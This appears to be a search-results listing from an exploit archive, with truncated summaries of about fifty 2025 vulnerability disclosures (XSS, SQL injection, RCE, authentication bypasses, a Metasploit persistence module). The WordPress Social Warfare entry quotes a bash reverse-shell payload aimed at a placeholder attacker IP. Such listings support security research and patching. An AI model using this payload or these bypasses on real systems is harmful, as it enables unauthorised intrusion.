50630 matches found
π HRM 1.0 2025 Cross Site Scripting
HRM version 1.0 2025 suffers from a cross site scripting vulnerability. Titles: HRM-1.0 2025 Cross-site scripting reflected Author: nu11secur1ty Date: 06/06/2025 Vendor: https://github.com/oretnom23 Software:...
π ABB Cylon Aspect 3.08.04 DeploySource Unauthenticated Remote Code Execution
ABB Cylon Aspect BMS/BAS version 3.08.04 is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate...
π Udev Persistence
This Metasploit module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk. It will be executed with root privileges every time a network interface other than l0 comes up. This module requires Metasploit: https://metasploit.com/download Current source:...
π Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution
This Metasploit module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM, tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated access to an administrator web API endpoint, which allows for code execution via expression language...
π Adapt CMS 3.0.3 Cross Site Scripting
Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability in the Send Message functionality. Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...
π Adapt CMS 3.0.3 Insecure Direct Object Reference / Incorrect Authorization
Adapt CMS version 3.0.3 suffers from an insecure direct object reference vulnerability that allows for privilege escalation. Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...
π WordPress Social Warfare 3.5.2 Remote Code Execution
Proof of concept remote code execution exploit for WordPress Social Warfare plugin versions 3.5.2 and below. !/usr/bin/env python3 Exploit Title: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin system"bash -c \"bash -i & /dev/tcp/ATTACKERIP/LISTENPORT 0&1\""' with...
π Adapt CMS 3.0.3 Cross Site Scripting
Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability via file upload. Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Stored XSS via...
π Microsoft Windows Registry Protection Removal
Thanks to OFFREG.dll, every unprivileged user can copy the registry tree HKEYCURRENTUSER except of course the registry keys where the policies are stored to an offline registry hive ntuser.man and thus get rid of any restrictions previously imposed via user group policies after logging off and on...
π Adapt CMS 3.0.3 Remote Shell Upload
Adapt CMS version 3.0.3 suffers from a remote shell upload vulnerability. Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE 1:...
π CloudClassroom PHP Project 1.0 SQL Injection
CloudClassroom PHP Project version 1.0 suffers from a time-based blind remote SQL Injection vulnerability. Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project:...
π ERPNext 15.53.1 Cross Site Scripting
ERPNext version 15.53.1 suffers from multiple persistent cross site scripting vulnerabilities. An authenticated user can inject malicious JavaScript into the userimage field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient...
π PSF Request Library Credential Leak
The PSF requests library leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. The PSF requests library https://github.com/psf/requests & https://pypi.org/project/requests/ leaks .netrc credentials to third parties due to incorrect URL processing und...
π Motivian Content Management System 41.0.0 Arbitrary File Upload
Motivian Content Management System version 41.0.0 suffers from an arbitrary file upload vulnerability. CVE-2025-29093-Arbitrary-File-Upload This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29093: Arbitrary File Upload This...
π Motivian Content Management System 41.0.0 Cross Site Scripting
Motivian Content Management System version 41.0.0 suffers from multiple cross site scripting vulnerabilities. CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29094:...
π WatchGuard 12.11 Memory Corruption
WatchGuard version 12.11 memory corruption proof of concept exploit. β$ cat watchguard12.11postauthclibof.py !/usr/bin/env python3 watchguard12.11postauthclibof.py this is a poc for post authorized stack overflow found in 'cli' binary. Tue Feb 4 06:12:20 EST 2025 by code610 More: networkdevice=...
π Unifiedtransform 2.x Course Editor Missing Authorization
Unifiedtransform version 2.x allows any user to access and modify course records via the /course/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify course details via the /course/edit/id endpoints...
π Unifiedtransform 2.x Student Editor Missing Authorization
Unifiedtransform version 2.x allows any user to access and modify student records via the /students/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify student records via the /students/edit/id...
π RustFly 2.0.0 Remote Code Execution
RustFly version 2.0.0 contains a critical vulnerability in its remote input processing layer that allows unauthenticated attackers to achieve remote code execution. RustFly v2.0.0- Remote Code Execution RCE Exploit Title: RustFly v2.0.0- Remote Code Execution RCE Date: 2025-05-29 Exploit Author:...
π Campcodes Online Hospital Management System 1.0 SQL Injection
Campcodes Online Hospital Management System version 1.0 suffers from a remote SQL injection vulnerability. Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection Google Dork: N/A Exploit Author: Carine Constantino Vendor Homepage: https://www.campcodes.com Software Link:...
π Windows File Explorer NTLM Hash Disclosure
Windows File Explorer on Microsoft Windows 11 23H2 proof of concept NTLM hash disclosure exploit. !/usr/bin/env python3 Exploit Title: Windows File Explorer Windows 11 23H2 - NTLM Hash Disclosure Exploit Author: Mohammed Idrees Banyamer Twitter/GitHub:https://github.com/mbanyamer Date: 2025-05-27...
π Kion Exchange Programs Software 1.21.9092.29966 Cross Site Scripting
Kion Exchange Programs Software versions 1.21.9092.29966 and below suffer from a cross site scripting vulnerability. Exploit Title: Kion Exchange Programs Software Reflected XSS CVE: CVE-2024-7130 PoC-Date: 2025-05-28 Exploit Author: Kutay ERGEN Vendor Homepage: https://www.kionexchangeprograms.c...
π Automic Agent 24.3.0 HF4 Privilege Escalation
Automic Agent version 24.3.0 HF4 suffers from a privilege escalation vulnerability. Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation Date: 26.05.2025 Exploit Author: Flora SchΓ€fer Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation Version:...
π Fortra GoAnywhere MFT 7.4.1 Authentication Bypass
Fortra GoAnywhere MFT version 7.4.1 proof of concept authentication bypass exploit. !/usr/bin/env python3 -- coding: utf-8 -- Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass Date: 2025-05-25 Exploit Author: @ibrahimsql Exploit Author's github: https://github.com/ibrahimsql Vend...
π Remote for Mac 2025.6 Unauthenticated Arbitrary Input
Remote for Mac version 2025.6 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-28 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...
π Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution. Both applications make use of a hardcoded machineKey in the IIS...
π Frappe Framework 15.56.1 SQL Injection
Frappe Framework version 15.56.1 suffers from a remote SQL injection vulnerability. An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.getlist API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields...
π eCharge Hardy Barth cPH2 / cPP2 Charging Stations 2.2.0 Command Injection / Backdoor
eCharge Hardy Barth cPH2 and cPP2 Charging Stations version 2.2.0 suffer from missing authentication, OS command injection, backdoor user accounts, backdoor functionality, and hardcoded key vulnerabilities. SEC Consult Vulnerability Lab Security Advisory...
π Remote for Mac 2025.6 Desktop Stream Disclosure
Remote for Mac version 2025.6 suffers from an unauthenticated desktop stream disclosure vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit Date: 2025-05-27 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...
π Remote for Mac 2025.6 Remote Code Execution
Remote for Mac version 2025.6 allows an unauthenticated remote attacker to achieve remote code execution by sending a crafted sequence of UDP packets that simulate keyboard input. Exploit Title: Remote for Mac 2025.6 - Remote Code Execution RCE Date: 2025-05-27 Exploit Author: Chokri Hammedi Vend...
π KRUKSTON BISTRO 1.0 SQL Injection
KRUKSTON BISTRO version 1.0 suffers from a remote SQL injection vulnerability. Titles: KRUKSTON-BISTRO-1.0 Multiple-SQLi Author: nu11secur1ty Date: 05/27/2025 Vendor: https://www.mayurik.com/ Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html Reference:...
π WordPress User Registration and Membership 4.1.2 Authentication Bypass
WordPress User Registration and Membership plugin versions 4.1.2 and below suffer from an authentication bypass vulnerability. !/usr/bin/env python3 Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Date: 2025-05-22 Exploit Author: Mohammed Idrees Banyam...
π Remote for Windows 2024.15 Unquoted Service Path
Remote for Windows version 2024.15 suffers from an unquoted service path vulnerability. Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link: https://rs.ltd/latest.php?os=win Version: 2024.1...
π Remote for Mac 2025.6 Desktop Screenshot Capture
Remote for Mac version 2025.6 suffers from an unauthenticated desktop screenshot capture vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Screenshot Capture Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...
π Remote for Windows 2024.15 Unauthenticated Arbitrary Input
Remote for Windows version 2024.15 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...
π vBulletin replaceAdTemplate Remote Code Execution
vBulletin replaceAdTemplate remote code execution proof of concept exploit. Versions 5.0.0 through 6.0.3 are affected. ?php / ----------------------------------------------------------------- vBulletin replaceAdTemplate Remote Code Execution Vulnerability...
π Grandstream GSD3710 1.0.11.13 Stack Buffer Overflow
Grandstream GSD3710 version 1.0.11.13 suffers from a stack buffer overflow vulnerability. !/usr/bin/env python3 Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow Google Dork: if applicable Date: 2025-05-23 Exploit Author: Pepelux user in ExploitDB Vendor Homepage:...
π Palo Alto 11.1.4-h7 Memory Corruption
Palo Alto version 11.1.4-h7 post authentication memory corruption proof of concept exploit. !/usr/bin/env python3 post auth cli memory corruption poc for paloalto 11.1.4-h7 19.01.2025 @ 00:23 postauth user in general 'admin' but we'll get back to that later ; can use cli to provide one of the...
π Java-springboot-codebase 1.1 Arbitrary File Read
Java-sprintboot-codebase version 1.1 suffers from an arbitrary file read vulnerability. Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read Google Dork: Date: 23/May/2025 Exploit Author: d3sca Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase Software Link:...
π Remote for Mac 2025.6 Remote Code Execution
Remote for Mac version 2025.6 suffers from an unauthenticated remote code execution vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link: https://cherpake.com/latest.php?os=ma...
π ABB Cylon Aspect 3.08.03 Network Manipulation
ABB Cylon Aspect MIX's IPConfigServlet allows unauthenticated network config changes via the Host: 127.0.0.1 bypass, writing to /etc/hosts and config files. Attackers can redirect traffic e.g. localhost to 1.2.3.4 or disrupt connectivity, amplifying impact with network restarts. Version 3.08.03 i...
π ABB Cylon Aspect 3.08.02 MIX Session Validation Bypass
ABB Cylon Aspect version 3.08.02 suffers from a broken session management issue. The backend implements inconsistent session validation by prioritizing the Authorization header over the PHPSESSID cookie, which is typically used to authenticate access to the controller systemβs admin panel. While...
π ABB Cylon Aspect Studio 3.08.03 Insecure Permissions
ABB Cylon Aspect Studio version 3.08.03 suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'M' flag Modify for...
π ABB Cylon BACnet MS/TP Kernel Module mstp.ko Out-Of-Bounds Write
A buffer overflow vulnerability exists in the mstp.ko kernel module, responsible for processing BACnet MS/TP frames over serial RS485. The SendFrame function writes directly into a statically sized kernel buffer allocentry0x1f5 without validating the length of attacker-controlled data param5. If ...
π ABB Cylon Aspect 3.08.03 Java/PHP Log Forging
Multiple PHP and Java components across the system fail to properly sanitize user-supplied input before including it in application logs. In PHP, files like supervisorProxy.php directly embed values such as $SERVER'REQUESTURI' and raw POST bodies into log messages without filtering, enabling...
π ABB Cylon Aspect 3.08.03 logMixDownload.php Remote Code Execution
The ABB BMS/BAS controller suffers from an authenticated blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'instance' HTTP POST parameter called by the logMixDownload.php script and dependant on SELECTED=ALL case. Version...
π ABB Cylon Aspect 3.08.03 login.php Obscure Authentication Bypass
The ABB Cylon Aspect BAS controller allows login using guest:guest, which initiates a web session but restricts access to administrative features by returning an 'Invalid Admin Username and/or Password' message. However, the session is still active and valid within the HMI environment. Despite...
π ABB Cylon Aspect 3.08.03 File Deletion
ABB Cylon Aspect version 3.08.03 BMS/BAS is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate...
π ABB Cylon Aspect 3.08.03 logYumLookup.php Path Traversal
The ABB Cylon Aspect BAS controller is vulnerable to an authenticated hybrid path traversal vulnerability in logYumLookup.php due to insufficient validation of the logFile parameter. The script checks for the presence of an expected path /var/log/yum.log using strpos, which can be bypassed by...
π ABB Cylon Aspect 3.08.03 Authentication Bypass
ABB Cylon Aspect version 3.08.03 BMS/BAS is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate...